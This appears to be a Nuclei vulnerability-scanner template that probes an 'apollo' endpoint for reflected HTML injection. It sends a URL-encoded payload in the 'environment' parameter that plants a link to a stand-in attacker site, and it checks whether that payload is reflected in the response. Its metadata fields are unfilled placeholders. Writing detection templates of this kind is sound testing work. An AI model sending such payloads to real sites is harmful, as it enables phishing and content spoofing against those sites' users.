id: reflected-xss-apollo

info:
  name: reflected-xss-apollo
  author: Daniel_v
  severity: high
  description: description
  reference: https://
  tags: tags

requests:
- raw:
  - |+
    GET /root?environment=%3Ch1%3E%3Cstrong%3EFor%20more%20environment%20Visit%20This%20website%3C%2Fstrong%3E%3C%2Fh1%3E%3Cstrong%3E%3Ca%20href%3D%22https:%2F%2Fwww.attackerrrr.com%22%3EClick%20Here%3C%2Fa%3E%3C%2Fstrong%3E HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Dnt: 1
    Connection: close


  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - 'www.attackerrrr.com'
  - type: status
    status:
    - 200
